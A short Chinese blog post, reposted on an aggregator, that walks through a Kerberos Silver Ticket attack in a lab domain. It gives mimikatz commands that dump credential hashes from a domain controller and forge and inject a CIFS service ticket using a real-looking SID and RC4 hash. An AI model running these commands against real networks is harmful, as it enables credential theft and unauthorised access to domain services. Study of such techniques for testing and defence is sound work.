首页 > 其他 > 详细

票据传递之白银票据

时间:2020-02-28 00:16:43      阅读:117      评论:0      收藏:0      [点我收藏+]

黄金票据是伪造 TGT,白银票据(Silver Ticket)是伪造 ST(Service Ticket),因为它不想黄金票据一样使用krgtgt账户的hash,而是使用计算机账户的hash进行加密的,所以只能获访问指定的权限。

前提条件:域名称、域SID、域服务账户的hash、伪造的用户名(任意用户或者不存在的用户)

环境原因这里没用自己部的,用的是klion师傅的域环境。
利用过程:
privilege::debug
sekurlsa::logonpasswords  进域控拿hash

技术分享图片

获取sid

技术分享图片

kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:OWA2010SP3.0day.org /service:cifs  /rc4:bec0097cc7cca53df5bfd48d85c48d68  /user:yangttt  /ptt

技术分享图片

 

票据传递之白银票据

原文:https://www.cnblogs.com/Yang34/p/12375223.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!